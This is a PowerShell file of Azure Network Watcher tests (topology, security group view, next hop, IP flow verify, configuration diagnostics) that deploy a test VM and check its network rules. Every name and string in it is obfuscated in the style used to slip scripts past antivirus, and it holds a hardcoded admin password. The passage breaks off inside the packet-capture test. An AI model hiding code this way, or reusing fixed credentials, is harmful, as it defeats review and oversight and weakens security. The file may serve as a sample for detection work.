function GET-TEst`R`esOuR`CE`SDepLo`y`meNt([string]${R`gN})
{
    ${vIr`TUaL`m`AcHiN`enaME} = &("{3}{2}{4}{0}{5}{1}" -f'ceNa','e','rpRes','Get-N','our','m')
    ${St`oRAGEaCCouN`T`N`AmE} = &("{0}{4}{1}{3}{2}" -f'Get','r','Name','pResource','-N')
    ${rou`TET`Ab`lenA`ME} = &("{1}{4}{5}{0}{2}{3}"-f'rpReso','G','urceNa','me','e','t-N')
    ${vIR`TUalnET`WO`R`kNa`Me} = &("{4}{2}{0}{1}{3}{5}" -f 'NrpReso','urceN','-','a','Get','me')
    ${ne`TWOrK`inTerFACE`N`A`Me} = &("{0}{4}{2}{5}{1}{3}"-f'Get','ceNa','pRe','me','-Nr','sour')
    ${ne`Tw`OrkseC`UR`ItyGroUP`N`A`mE} = &("{3}{2}{5}{1}{0}{4}"-f'ourc','Res','N','Get-','eName','rp')
    ${dI`A`GNosTiCsStO`R`AGeA`CcOUN`Tn`AME} = &("{0}{1}{2}{4}{3}{5}"-f'G','et-','NrpResou','a','rceN','me')
    
        ${PARamF`i`Le} = (&("{2}{1}{0}" -f 'ath','solve-P','Re') ((("{6}{1}{4}{7}{2}{5}{3}{0}"-f'rs.json','{0}T','{0}Deplo','e','estDat','ymentParamet','.','a'))  -f[CHAR]92))."P`ATH"
        ${p`ARaMCONt`ent} =
@"
{
            "rgName": {
            "value": "$rgn"
            },
            "location": {
            "value": "$location"
            },
            "virtualMachineName": {
            "value": "$virtualMachineName"
            },
            "virtualMachineSize": {
            "value": "Standard_A4"
            },
            "adminUsername": {
            "value": "netanaytics12"
            },
            "storageAccountName": {
            "value": "$storageAccountName"
            },
            "routeTableName": {
            "value": "$routeTableName"
            },
            "virtualNetworkName": {
            "value": "$virtualNetworkName"
            },
            "networkInterfaceName": {
            "value": "$networkInterfaceName"
            },
            "networkSecurityGroupName": {
            "value": "$networkSecurityGroupName"
            },
            "adminPassword": {
            "value": "netanalytics-32${resourceGroupName}"
            },
            "storageAccountType": {
            "value": "Standard_LRS"
            },
            "diagnosticsStorageAccountName": {
            "value": "$diagnosticsStorageAccountName"
            },
            "diagnosticsStorageAccountId": {
            "value": "Microsoft.Storage/storageAccounts/${diagnosticsStorageAccountName}"
            },
            "diagnosticsStorageAccountType": {
            "value": "Standard_LRS"
            },
            "addressPrefix": {
            "value": "10.17.3.0/24"
            },
            "subnetName": {
            "value": "default"
            },
            "subnetPrefix": {
            "value": "10.17.3.0/24"
            },
            "publicIpAddressName": {
            "value": "${virtualMachineName}-ip"
            },
            "publicIpAddressType": {
            "value": "Dynamic"
            }
}
"@;

        ${S`T} = &("{1}{2}{3}{0}"-f 'ent','Se','t-Co','nt') -Path ${p`A`RaMfile} -Value ${PA`Ra`MC`ONTent} -Force;
        &("{7}{0}{2}{1}{6}{3}{4}{5}" -f'zRe','u','so','De','ploym','ent','rceGroup','New-A')  -Name "${rgn}" -ResourceGroupName "$rgn" -TemplateFile "$templateFile" -TemplateParameterFile ${PAram`Fi`Le}
}

function GET`-`NrpreS`OU`R`cEnamE
{
	&("{4}{2}{1}{3}{0}"-f'e','ource','-Res','Nam','Get') ("{0}{1}"-f 'ps','nrp');
}

function gET-Nr`p`RESOU`RCEgr`oupnAMe
{
	&("{5}{4}{3}{1}{0}{2}" -f'oupNa','r','me','urceG','-Reso','Get') ("{0}{1}"-f'psnr','p');
}

function Wa`I`T-VM(${V`m})
{
    
    ${M`INu`TeS} = 30;
    while((&("{0}{1}{2}" -f 'Get','-','AzVM') -ResourceGroupName ${V`M}."rEs`oURCe`g`R`OUPnAmE" -Name ${Vm}."n`AmE")."p`ROvISio`N`inG`s`Tate" -ne ("{0}{1}"-f 'Su','cceeded'))
    {
        &("{1}{0}{2}" -f'st','Start-Te','Sleep') 60;
        if(--${Mi`NU`TeS} -eq 0)
        {
            break;
        }
    }
}


function get-CrEa`T`etest`Netwo`RK`wAt`Ch`Er(${lOCA`Ti`ON}, ${nw`Na`Me}, ${Nwr`g`NAME})
{
    ${n`W} = ${NU`ll}
    ${cA`NO`NicAll`oCAt`iON} = &("{4}{1}{2}{3}{0}"-f 'n','orma','lize-L','ocatio','N') ${l`OC`AtiOn}

    
    ${N`wLisT} = &("{1}{5}{4}{0}{3}{2}" -f'W','Ge','tcher','a','twork','t-AzNe')
    foreach (${i} in ${n`WList})
    {
        if(${I}."lOCA`T`IOn" -eq ${CAn`oNIC`A`lLoca`T`ioN})
        {
            ${nw} = ${I}
            break
        }
    }

    
    if(!${N`w})
    {
        ${nW} = &("{3}{0}{5}{2}{1}{4}" -f'e','Wat','ork','N','cher','w-AzNetw') -Name ${NWn`A`ME} -ResourceGroupName ${NWRG`Name} -Location ${lOC`At`IoN}
    }

    return ${NW}
}

function gET`-`CANaR`yLOca`TIoN
{
    &("{2}{1}{3}{0}" -f'erLocation','-Pr','Get','ovid') ("{1}{4}{7}{0}{3}{2}{5}{6}{9}{8}"-f'/ne','Mic','rk','two','rosoft.Netw','Watc','h','ork','s','er') ("{2}{1}{4}{3}{0}"-f 'P',' U','Central','UA','S E');
}

function Get-`pi`l`otlo`CaT`ioN
{
    &("{1}{4}{3}{5}{2}{0}" -f'tion','Get-P','a','erL','rovid','oc') ("{9}{1}{2}{5}{7}{4}{6}{8}{0}{3}"-f'che','o','ft.Net','rs','r','wor','kW','k/netwo','at','Micros') ("{1}{0}{2}"-f 'ral U','West Cent','S');
}


function t`Est-`GeTTO`p`oLogY
{
    
    ${ReS`oUR`cE`gR`oUPNAMe} = &("{0}{1}{4}{2}{3}{5}"-f 'Get','-','sourceGr','ou','NrpRe','pName')
    ${NwN`AMe} = &("{3}{2}{1}{0}" -f 'rceName','ou','-NrpRes','Get')
    ${nw`R`gN`AmE} = &("{0}{4}{3}{5}{1}{2}"-f 'Get-NrpRe','ou','pName','o','s','urceGr')
    ${tEm`plAtEfI`LE} = (&("{2}{0}{1}{3}"-f 'solv','e-Pat','Re','h') ((("{5}{9}{1}{7}{6}{3}{0}{4}{8}{2}" -f'p','ata','yment.json','e','l','.QFqTes','qD','QF','o','tD')).("{1}{0}" -f 'LaCE','REP').Invoke('QFq','\')))."P`ATh"
    ${l`o`CA`TIoN} = &("{4}{1}{3}{0}{5}{2}" -f 'v','Pr','tion','o','Get-','iderLoca') ("{1}{9}{6}{3}{2}{4}{7}{8}{5}{0}"-f'chers','Microso','r','wo','k/n','Wat','et','e','twork','ft.N') ("{2}{0}{1}" -f 'U','S','East ')

    try 
    {
        . ((("{1}{7}{6}{2}{3}{0}{4}{8}{5}" -f'.R','.{0}','r','eRM','esour','.ps1','u','Az','ces')) -F  [ChAR]92)

        
        &("{0}{4}{2}{3}{1}" -f'Ne','p','AzR','esourceGrou','w-') -Name ${rESOU`RCe`G`R`oUpNamE} -Location "$location"
        
        
        &("{1}{4}{3}{2}{0}" -f 't','G','oymen','estResourcesDepl','et-T') -rgn "$resourceGroupName"
        
		
        &("{0}{1}{3}{2}" -f'New-AzResour','ceGr','up','o') -Name ${nWrg`NA`me} -Location "$location"
        
        
		${nw} = &("{7}{3}{1}{5}{0}{2}{6}{4}" -f 'estNe','Create','tworkWa','et-','er','T','tch','G') -location ${LOC`AtioN} -nwName ${NWn`A`mE} -nwRgName ${n`wr`GNa`ME}

        
        ${tOPOl`OGy} = &("{1}{5}{7}{2}{0}{6}{3}{4}"-f 'erT','Ge','kWatch','l','ogy','t','opo','-AzNetwor') -NetworkWatcher ${nw} -TargetResourceGroupName ${R`EsOu`R`CEGRo`UPnAME}

        
        ${vm} = &("{2}{0}{1}"-f'e','t-AzVM','G') -ResourceGroupName ${R`Esour`cEGr`O`UPNAmE}

        
        ${n`Ic} = &("{4}{2}{1}{3}{5}{0}"-f 'face','r','AzNetwo','k','Get-','Inter') -ResourceGroupName ${r`E`s`OUrcE`gROU`PnamE}
    }
    finally
    {
        
        &("{1}{0}{3}{2}"-f 'ean-Resour','Cl','roup','ceG') ${REsOU`RCegroUpn`A`mE}
        &("{3}{0}{4}{1}{2}" -f 'Gr','u','p','Clean-Resource','o') ${N`WRgN`AME}
    }
}


function T`ESt`-gEtS`EcUrIt`ygr`OUp`View
{ 
    
    ${rE`s`ourceGroU`pN`AME} = &("{3}{0}{5}{1}{6}{2}{4}"-f 't','eso','roupNam','Ge','e','-NrpR','urceG')
    ${n`W`NaMe} = &("{2}{0}{1}{3}{4}{5}" -f'eso','ur','Get-NrpR','c','eN','ame')
    ${LO`caT`ioN} = &("{1}{2}{4}{0}{3}" -f 'o','G','e','tLocation','t-Pil')
    ${reSourC`eTY`PeP`ARe`NT} = ("{5}{3}{1}{4}{2}{0}{7}{6}"-f 'tc','netwo','kWa','crosoft.Network/','r','Mi','ers','h')
    ${nwlOc`A`Tion} = &("{3}{2}{1}{0}{5}{4}{6}"-f'r','-P','t','Ge','vider','o','Location') ${rESou`Rc`etYp`e`ParEnt}
    ${nW`RgnA`Me} = &("{3}{5}{2}{6}{1}{0}{4}{7}" -f 'upN','eGro','e','Get-Nr','am','pR','sourc','e')
    ${s`EcUrI`TY`RulE`Name} = &("{2}{5}{3}{1}{4}{0}"-f 'Name','rc','Ge','-NrpResou','e','t')
    ${te`M`P`l`AtEFILE} = (&("{1}{0}{2}{3}"-f 'esolve-P','R','a','th') ((("{5}{1}{4}{3}{8}{2}{7}{6}{0}" -f 'n','nTes','ent.j','eploy','tDataS3nD','.S3','o','s','m'))  -CrePlacE ([cHAr]83+[cHAr]51+[cHAr]110),[cHAr]92))."PA`TH"
    
    try 
    {
        . ((("{0}{4}{3}{7}{6}{8}{2}{5}{1}" -f '.{0}','1','s','RM','Azure','.ps','Reso','.','urce'))-F  [ChAr]92)

        
        &("{2}{3}{1}{0}" -f 'urceGroup','Reso','New-','Az') -Name ${REsoU`R`C`e`GrOUPnamE} -Location "$location"

        
        &("{3}{4}{6}{5}{1}{0}{2}" -f'ym','rcesDeplo','ent','G','et-','sou','TestRe') -rgn "$resourceGroupName"
        
        
        &("{3}{4}{2}{0}{1}"-f'rce','Group','u','N','ew-AzReso') -Name ${n`WR`GnaMe} -Location "$location"
        
        
		${Nw} = &("{5}{1}{0}{4}{7}{2}{6}{3}"-f 'a','-Cre','wo','r','teT','Get','rkWatche','estNet') -location ${lOc`A`TIon} -nwName ${n`wna`ME} -nwRgName ${N`W`R`GnaMe}
        
        
        ${V`m} = &("{0}{1}{2}" -f 'Ge','t','-AzVM') -ResourceGroupName ${RESourC`Eg`Rou`PNAME}
        
        
        ${N`sg} = &("{1}{2}{6}{3}{4}{5}{0}" -f 'up','Get-AzN','et','rkSec','u','rityGro','wo') -ResourceGroupName ${r`esOUR`Ce`G`RoupNa`mE}
        
        
        ${n`sG}[0] | &("{3}{5}{4}{1}{2}{0}{7}{6}"-f'eC','zNet','workSecurityRul','Ad','-A','d','g','onfi') -Name ("{1}{0}" -f '1','scr') -Description ("{0}{1}"-f't','est') -Protocol ("{0}{1}"-f'Tc','p') -SourcePortRange ('*') -DestinationPortRange 80 -SourceAddressPrefix ('*') -DestinationAddressPrefix ('*') -Access ("{0}{1}"-f'De','ny') -Priority 122 -Direction ("{0}{1}"-f 'Out','bound')
        ${n`SG}[0] | &("{3}{1}{5}{2}{0}{4}"-f 'Gro','orkS','y','Set-AzNetw','up','ecurit')

        &("{2}{0}{1}{3}"-f'ai','t-Second','W','s') 300

        
        ${J`OB} = &("{6}{0}{2}{9}{3}{4}{8}{1}{5}{7}" -f'e','Group','t-Az','erSecur','i','V','G','iew','ty','NetworkWatch') -NetworkWatcher ${nw} -Target ${vm}."ID" -AsJob
        ${j`oB} | &("{1}{2}{0}" -f't-Job','W','ai')
        ${NS`GvI`ew} = ${J`Ob} | &("{1}{3}{0}{2}"-f'e','Rec','-Job','eiv')

        
        &("{2}{0}{1}{3}" -f'AreE','q','Assert-','ual') ${NS`GvieW}."n`E`TWoRKinTE`RfAc`Es"[0]."EfFE`c`TiveS`ECurI`T`YrUl`es"[4]."ACC`E`ss" ("{1}{0}"-f'ny','De') 
        &("{2}{1}{0}" -f'ual','Eq','Assert-Are') ${N`sgVI`Ew}."NeT`w`OrK`iNTeR`Fa`cEs"[0]."EFfec`T`iVE`secuRiTYR`Ules"[4]."dESt`I`NatIOn`po`RTrAN`Ge" ("{0}{1}"-f'80','-80') 
        &("{0}{2}{3}{1}"-f 'Assert','ual','-Are','Eq') ${nS`g`ViEw}."net`wO`Rkin`T`ERfaCEs"[0]."e`FFE`cTiV`EsECUR`ityruLES"[4]."DireC`T`Ion" ("{2}{0}{1}"-f'n','d','Outbou') 
        &("{3}{1}{0}{2}{4}" -f'e','s','rt-Ar','As','eEqual') ${Ns`g`View}."Ne`TwORKint`E`RfAces"[0]."EffEC`Tives`Ec`UrITyR`UleS"[4]."Na`ME" ("{2}{0}{1}"-f 'ule_s','cr1','UserR') 
        &("{2}{0}{3}{1}"-f 'ert-AreEq','l','Ass','ua') ${NS`g`ViEw}."NeTwor`ki`NTe`R`F`ACes"[0]."eFFEcT`ive`SEC`URITy`RuLEs"[4]."PrO`To`CoL" ("{0}{1}"-f'TC','P') 
        &("{3}{0}{2}{1}" -f't-','Equal','Are','Asser') ${nS`gVi`Ew}."NET`worKintE`Rf`ACEs"[0]."efF`E`C`TivEsECuR`ItYR`U`Les"[4]."prIOr`I`Ty" 122 
    }
    finally
    {
        
        &("{2}{1}{0}{3}"-f 'u','ean-ResourceGro','Cl','p') ${rEs`O`Ur`cEGr`ouPn`AmE}
        &("{0}{3}{1}{2}"-f 'Clean','sour','ceGroup','-Re') ${n`w`Rg`NAMe}
    }
}


function teS`T`-gEtnExtHOp
{
    
    ${R`esO`U`RCEGrou`PNaME} = &("{5}{1}{2}{0}{4}{3}"-f 'ourceGroupN','t-N','rpRes','e','am','Ge')
    ${n`Wn`Ame} = &("{3}{1}{2}{0}"-f 'me','NrpRes','ourceNa','Get-')
    ${nw`RgN`AMe} = &("{1}{4}{2}{3}{0}" -f 'Name','Get-Nr','urceG','roup','pReso')
    ${s`E`cuRIt`yRULENA`me} = &("{2}{0}{3}{1}{5}{4}" -f'-Nr','esour','Get','pR','eName','c')
    ${T`E`mp`Lat`eFILe} = (&("{2}{0}{1}"-f 'sol','ve-Path','Re') ((("{6}{4}{0}{1}{7}{5}{2}{3}{8}" -f'a','ta{0}De','ent.js','o','TestD','oym','.{0}','pl','n'))-f [cHAr]92))."PA`TH"
    ${Lo`CA`TION} = &("{0}{1}{2}{3}" -f 'Get-Provid','e','rLoc','ation') ("{7}{5}{2}{3}{4}{6}{0}{1}{8}"-f'k','W','f','t','.Net','o','work/networ','Micros','atchers') ("{1}{0}"-f 'st US','Ea')
    
    try 
    {
        . ((("{3}{0}{4}{5}{2}{1}" -f '{0}Azur','ces.ps1','our','.','eR','M.Res'))  -F[chAr]92)

        
        &("{4}{0}{2}{1}{3}" -f'ew','e','-AzResourc','Group','N') -Name ${reS`OUrceg`RoUpn`A`mE} -Location "$location"

        
        &("{1}{5}{0}{2}{3}{4}"-f 'TestResou','G','rce','sDeployme','nt','et-') -rgn "$resourceGroupName"
        
        
        &("{4}{1}{0}{2}{5}{3}" -f'zR','-A','esour','Group','New','ce') -Name ${N`Wr`GnaME} -Location "$location"
        
        
		${NW} = &("{0}{2}{3}{1}{4}{5}"-f 'Get-Crea','Network','teT','est','W','atcher') -location ${lO`caTION} -nwName ${NW`Na`Me} -nwRgName ${NwRgN`A`Me}
        
        
        ${v`M} = &("{0}{1}{2}"-f'G','et','-AzVM') -ResourceGroupName ${reSoUR`cEgr`oUp`NaME}
        
        
        ${ADd`R`eSs} = &("{1}{4}{3}{0}{2}" -f'icIp','G','Address','Publ','et-Az') -ResourceGroupName ${reS`O`U`RcegrO`UPnA`Me}

        
        ${J`oB} = &("{3}{0}{2}{4}{1}" -f 'AzNet','tHop','workWatche','Get-','rNex') -NetworkWatcher ${N`w} -TargetVirtualMachineId ${v`M}."Id" -DestinationIPAddress ("{2}{1}{0}" -f'.6','.3','10.1') -SourceIPAddress ${add`R`eSS}."I`PaDD`ResS" -AsJob
        ${J`OB} | &("{2}{1}{0}" -f 't-Job','i','Wa')
        ${N`eXtHO`p1} = ${J`OB} | &("{3}{1}{2}{0}" -f'Job','ve','-','Recei')
        ${nE`X`THo`p2} = &("{3}{6}{2}{4}{0}{7}{1}{5}" -f 't','kW','N','Get-A','e','atcherNextHop','z','wor') -NetworkWatcher ${n`W} -TargetVirtualMachineId ${vm}."iD" -DestinationIPAddress ("{2}{1}{0}"-f'.14','.11.12','12') -SourceIPAddress ${ad`dre`SS}."i`p`AddREss"
    
        
        &("{2}{0}{1}{3}" -f 'Ar','eEq','Assert-','ual') ${N`Ext`hop1}."Nex`TH`o`PtypE" ("{1}{0}" -f 'one','N')
        &("{0}{1}{2}" -f 'Asse','rt-AreE','qual') ${N`E`XTh`op1}."Nex`ThO`piP`AddR`ess" ("{0}{1}{2}" -f'10.0','.1.','2')
        &("{0}{3}{2}{1}" -f 'Ass','-AreEqual','rt','e') ${NEXT`HOp2}."n`eXT`hopty`PE" ("{1}{0}"-f 'nternet','I')
        &("{2}{1}{0}{3}" -f 'Eq','Are','Assert-','ual') ${N`E`xthOP2}."rout`eTA`BLeiD" ("{0}{3}{1}{2}" -f'Sy','o','ute','stem R')
    }
    finally
    {
        
        &("{3}{1}{5}{0}{2}{4}" -f'urc','ean','e','Cl','Group','-Reso') ${rEso`UrcEGRo`UPnA`mE}
        &("{1}{3}{4}{0}{2}" -f'eGro','C','up','lean','-Resourc') ${Nw`RGnAmE}
    }
}


function teS`T`-v`eRIF`Y`IPFLOw
{
    
    ${rES`Ou`RcEGr`ouPNAme} = &("{1}{5}{4}{3}{2}{0}{7}{6}"-f 'N','Ge','rceGroup','ou','-NrpRes','t','me','a')
    ${nWn`A`me} = &("{5}{3}{1}{0}{2}{4}"-f'ceN','our','a','rpRes','me','Get-N')
    ${nW`RGN`A`me} = &("{2}{4}{0}{1}{3}"-f 'e','GroupN','Get-NrpRe','ame','sourc')
    ${SE`C`URity`GROuPNAME} = &("{0}{1}{2}{3}{4}" -f 'G','et-NrpR','esou','r','ceName')
    ${TeMp`LaT`eFiLe} = (&("{3}{0}{1}{2}"-f 've-P','a','th','Resol') ((("{2}{8}{6}{7}{5}{0}{4}{1}{3}" -f 'a','rpDeployment.j','.P','son','P','tDat','pTe','s','r')) -CrEplACE ([CHaR]80+[CHaR]114+[CHaR]112),[CHaR]92))."p`Ath"
    ${L`oC`A`TioN} = &("{6}{0}{4}{2}{1}{3}{5}"-f 't-Pr','rLoc','vide','ati','o','on','Ge') ("{2}{1}{6}{8}{0}{7}{4}{3}{5}"-f '/net','t','Microsof','tc','rkWa','hers','.Networ','wo','k') ("{1}{2}{0}"-f'st US','E','a')
    
    try 
    {
        . ((("{3}{6}{4}{1}{5}{0}{2}" -f's.ps','reRM.Re','1','.{','zu','source','0}A'))-F  [chAR]92)

        
        &("{2}{0}{4}{1}{5}{3}"-f'w-Az','ourc','Ne','up','Res','eGro') -Name ${REs`O`UrceGro`U`pnAME} -Location "$location"

        
        &("{2}{0}{1}{5}{3}{4}"-f'-TestRe','so','Get','esDeplo','yment','urc') -rgn "$resourceGroupName"
        
        
        &("{2}{4}{3}{1}{0}" -f 'eGroup','rc','New-AzR','u','eso') -Name ${n`WRGNAmE} -Location "$location"
        
        
		${nW} = &("{6}{1}{4}{7}{5}{2}{0}{3}{8}"-f 'wor','et-Creat','et','kW','eT','N','G','est','atcher') -location ${l`OCA`TIoN} -nwName ${N`wna`ME} -nwRgName ${N`WRgN`AmE}
        
        
        ${N`SG} = &("{4}{6}{3}{5}{1}{2}{0}"-f 'p','o','u','ecurity','Get-AzNe','Gr','tworkS') -ResourceGroupName ${RE`sou`RCe`G`RouPName}

        
        ${n`sg}[0] | &("{5}{3}{2}{4}{1}{0}" -f 'fig','RuleCon','etworkSe','N','curity','Add-Az') -Name ("{1}{0}" -f'r1','sc') -Description ("{1}{0}"-f'est1','t') -Protocol ("{1}{0}" -f 'cp','T') -SourcePortRange ('*') -DestinationPortRange 80 -SourceAddressPrefix ('*') -DestinationAddressPrefix ('*') -Access ("{0}{1}"-f'De','ny') -Priority 122 -Direction ("{0}{1}"-f'Ou','tbound')
        ${N`Sg}[0] | &("{5}{7}{4}{1}{0}{6}{3}{2}" -f 'kSecu','or','Group','y','-AzNetw','Se','rit','t')

        ${N`Sg}[0] | &("{8}{5}{3}{1}{7}{0}{6}{2}{4}" -f 'yRule','orkSecu','nfi','Netw','g','z','Co','rit','Add-A') -Name ("{0}{1}"-f 's','r2') -Description ("{1}{0}"-f 'est2','t') -Protocol ("{1}{0}" -f'cp','T') -SourcePortRange ("{1}{0}" -f'3-45','2') -DestinationPortRange ("{0}{1}" -f'46-5','6') -SourceAddressPrefix ('*') -DestinationAddressPrefix ('*') -Access ("{0}{1}" -f 'All','ow') -Priority 123 -Direction ("{0}{1}{2}" -f'In','bou','nd')
        ${N`SG}[0] | &("{0}{3}{2}{4}{5}{1}"-f 'Set-Az','p','Secur','Network','i','tyGrou')

        &("{2}{1}{3}{0}"-f'ds','e','Wait-S','con') 300

        
        ${v`m} = &("{1}{0}"-f'M','Get-AzV') -ResourceGroupName ${R`eSOuRCeGROU`pnA`ME}
        
        
        ${n`Ic} = &("{3}{1}{0}{2}{4}{5}"-f't-AzNetworkInt','e','erfa','G','c','e') -ResourceGroupName ${RE`S`oURc`egrOUPNa`me}
        ${AD`D`RESS} = ${N`iC}[0]."ipco`N`FIGUR`AT`ionS"[0]."PriVatE`IPaDDRe`Ss"

        
        ${j`oB} = &("{2}{0}{3}{5}{6}{7}{4}{1}"-f 'st-Az','low','Te','Net','herIPF','workW','a','tc') -NetworkWatcher ${NW} -TargetVirtualMachineId ${VM}."i`D" -Direction ("{1}{0}" -f 'und','Inbo') -Protocol ("{1}{0}"-f 'p','Tc') -RemoteIPAddress ("{0}{3}{2}{1}"-f '1','.11.12.14','1','2') -LocalIPAddress ${aD`D`RESs} -LocalPort 50 -RemotePort 40 -AsJob
        ${j`Ob} | &("{1}{2}{0}" -f'Job','Wa','it-')
        ${vEr`IFI`cati`on1} = ${j`ob} | &("{0}{2}{1}"-f 'R','Job','eceive-')
        ${VER`ifiCaTi`ON2} = &("{6}{5}{4}{3}{2}{1}{0}" -f 'w','Flo','rIP','e','tworkWatch','st-AzNe','Te') -NetworkWatcher ${nW} -TargetVirtualMachineId ${v`M}."id" -Direction ("{2}{0}{1}" -f 'bou','nd','Out') -Protocol ("{0}{1}"-f 'Tc','p') -RemoteIPAddress ("{3}{1}{0}{2}"-f '.12.','.11','14','12') -LocalIPAddress ${ADD`Re`Ss} -LocalPort 80 -RemotePort 80

        
        &("{1}{2}{3}{0}" -f'reEqual','A','s','sert-A') ${V`e`RIficA`TIOn2}."Ac`CeSs" ("{0}{1}" -f 'Den','y')
        &("{0}{2}{3}{1}"-f'As','al','sert-Are','Equ') ${VeRI`FIC`ATi`o`N2}."R`ULe`NAme" ("{3}{1}{2}{0}" -f 'les/scr1','curity','Ru','se')
    }
    finally
    {
        
        &("{1}{5}{0}{3}{2}{4}" -f 'ur','Clean-Res','Grou','ce','p','o') ${rEso`UrcEGrOu`p`NAmE}
        &("{0}{2}{4}{5}{1}{3}" -f'Clean-','ro','Res','up','o','urceG') ${N`WRgna`Me}
    }
}


function Te`St-ne`TWOrk`C`ON`FiguRaTIOnDIAG`NOStiC
{
    
    ${resO`UrceGr`o`U`PnAmE} = &("{1}{5}{0}{4}{2}{6}{3}" -f 's','Get-','rceGro','Name','ou','NrpRe','up')
    ${NW`NAME} = &("{4}{5}{3}{2}{0}{1}" -f'eN','ame','sourc','NrpRe','Ge','t-')
    ${nwR`GN`AMe} = &("{1}{3}{4}{2}{5}{0}" -f 'Name','Get-NrpRe','rceGro','s','ou','up')
    ${SE`c`UrIT`yGrOupn`AME} = &("{2}{1}{0}{3}{4}"-f'p','t-Nr','Ge','ResourceNam','e')
    ${teMp`laTeFi`le} = (&("{1}{2}{3}{0}" -f'h','Res','olve-P','at') ((("{0}{3}{1}{5}{2}{4}" -f '.','tDataCgeDe','ent.jso','CgeTes','n','ploym'))  -REPLaCe([Char]67+[Char]103+[Char]101),[Char]92))."P`Ath"
    ${L`OCatIon} = &("{4}{0}{5}{3}{2}{1}" -f'ro','n','atio','Loc','Get-P','vider') ("{0}{3}{2}{6}{1}{4}{5}{7}"-f 'Micro','ork/','ft.Ne','so','networkWa','tcher','tw','s') ("{0}{1}{2}"-f'Ea','s','t US')
    
    try 
    {
        . ((("{0}{3}{8}{2}{1}{5}{7}{6}{4}" -f '.HRXA','c','r','zu','1','e','.ps','s','reRM.Resou'))."re`PLAcE"(([Char]72+[Char]82+[Char]88),'\'))

        
        &("{3}{6}{1}{2}{0}{5}{4}" -f'sourc','-','AzRe','N','roup','eG','ew') -Name ${Re`S`oUR`cEGRou`pn`AmE} -Location "$location"

        
        &("{3}{5}{2}{4}{0}{6}{1}" -f 'ce','nt','TestRe','Get','sour','-','sDeployme') -rgn "$resourceGroupName"
        
        
        &("{3}{1}{2}{0}"-f'p','urce','Grou','New-AzReso') -Name ${N`WrG`NAme} -Location "$location"
        
        
        ${N`W} = &("{4}{5}{3}{0}{2}{1}"-f'est','kWatcher','Networ','teT','Get-','Crea') -location ${LoC`A`T`ION} -nwName ${n`wNAmE} -nwRgName ${Nw`RGn`AMe}
        
        
        ${n`sG} = &("{5}{1}{2}{0}{4}{3}" -f 'ecurity','-A','zNetworkS','p','Grou','Get') -ResourceGroupName ${rESOur`ce`gR`oUPnAMe}

        
        ${v`m} = &("{1}{2}{0}"-f'zVM','Get-','A') -ResourceGroupName ${ReSOUrCE`G`R`OUPNAme}

        
        ${PRO`F`iLE} = &("{8}{14}{1}{6}{12}{10}{0}{2}{11}{4}{7}{9}{5}{3}{13}" -f 'onfigurat','AzN','io','i','gnost','of','etworkWat','icP','Ne','r','C','nDia','cherNetwork','le','w-') -Direction ("{1}{0}"-f'nbound','I') -Protocol ("{1}{0}"-f'cp','T') -Source ("{1}{2}{0}" -f'4','1','0.1.1.') -Destination ('*') -DestinationPort 50 
        ${r`eSU`Lt1} = &("{6}{7}{2}{5}{8}{0}{3}{4}{1}"-f'u','ic','etworkWa','rationDiagnos','t','tcherNetwor','Invoke-','AzN','kConfig') -NetworkWatcher ${nW} -TargetResourceId ${vM}."Id" -Profile ${PR`OfILe}
        ${r`eSUlt2} = &("{7}{6}{4}{0}{8}{2}{5}{1}{3}"-f'NetworkWatche','ionDiagnost','figura','ic','-Az','t','nvoke','I','rNetworkCon') -NetworkWatcher ${N`W} -TargetResourceId ${V`m}."i`d" -Profile ${Pro`File} -VerbosityLevel ("{1}{0}" -f 'l','Ful')

        
        &("{0}{3}{2}{1}{4}" -f 'As','r','t-A','ser','eEqual') ${ReS`U`Lt1}."r`eSuLtS"[0]."pr`ofI`lE"."dIREc`Ti`on" ("{0}{2}{1}"-f 'In','d','boun')
        &("{1}{2}{3}{0}"-f 'l','Assert-A','reEq','ua') ${R`es`UlT1}."REsu`LTS"[0]."prof`ilE"."P`RO`TOCol" ("{1}{0}"-f 'p','Tc')
        &("{2}{1}{3}{0}"-f 'l','rt-Ar','Asse','eEqua') ${RE`s`UlT1}."resu`Lts"[0]."PrO`FI`Le"."soU`RCe" ("{0}{2}{1}"-f'1','1.4','0.1.')
        &("{3}{0}{1}{2}"-f 's','s','ert-AreEqual','A') ${res`U`Lt1}."R`ESULtS"[0]."PR`O`FiLE"."desTI`N`AT`IoN`POrt" 50
        &("{3}{2}{0}{1}"-f'Eq','ual','re','Assert-A') ${rE`S`ULt1}."rEs`U`LTs"[0]."netW`or`KSEcuR`I`Ty`grOupResUlt"."SeCU`RI`TYrUl`e`AC`ceSsR`eSulT" ("{0}{1}" -f'Den','y')
    }
    finally
    {
        
        &("{1}{3}{2}{0}" -f 'urceGroup','Cle','Reso','an-') ${rESOURcE`g`R`ou`pna`mE}
        &("{4}{3}{0}{2}{1}"-f'n-Resou','ceGroup','r','lea','C') ${NWr`g`NAmE}
    }
}


function TeSt-`packet`C`APtU`Re
{
    
    ${resoU`RCEgROu`P`NaME} = &("{1}{5}{4}{0}{3}{2}" -f 'esour','Get-N','upName','ceGro','pR','r')
    ${nW`N`AME} = &("{3}{2}{0}{1}"-f'ceN','ame','our','Get-NrpRes')
    ${lo`CaTIOn} = &("{1}{2}{0}{3}"-f'ti','Get-Pil','otLoca','on')
    ${r`ESO`UrC`ETyP`ePa`RenT} = ("{8}{7}{5}{4}{3}{0}{1}{2}{6}"-f 'r','kW','atche','o','twork/netw','Ne','rs','.','Microsoft')
    ${N`WlocA`T`ion} = &("{3}{2}{0}{1}{4}"-f 'ide','rLocatio','ov','Get-Pr','n') ${rES`OURc`eTY`PepARenT}
    ${n`W`RgnamE} = &("{1}{3}{4}{2}{0}{5}" -f'oupNa','G','Gr','et-NrpRe','source','me')
    ${sEcuRity`Gr`oUPNA`ME} = &("{2}{5}{3}{4}{0}{1}" -f'Nam','e','Get','ur','ce','-NrpReso')
    ${T`e`MplAtefI`LE} = (&("{0}{3}{2}{1}"-f 'Reso','ath','-P','lve') ((("{5}{1}{3}{0}{2}{4}" -f'Data075De','es','ploymen','t','t.json','.075T'))-crEpLacE'075',[CHAr]92))."pA`Th"
    ${pc`NaME1} = &("{2}{1}{3}{0}" -f'urceName','NrpRes','Get-','o')
    ${pC`NaM`e2} = &("{4}{0}{3}{2}{5}{1}"-f 'Nrp','me','e','R','Get-','sourceNa')
    
    try 
    {
        . ((("{7}{6}{2}{5}{3}{0}{1}{4}"-f'r','c','M.R','ou','es.ps1','es','zureR','.0AvA'))."r`EplA`ce"(([cHAr]48+[cHAr]65+[cHAr]118),'\'))

        
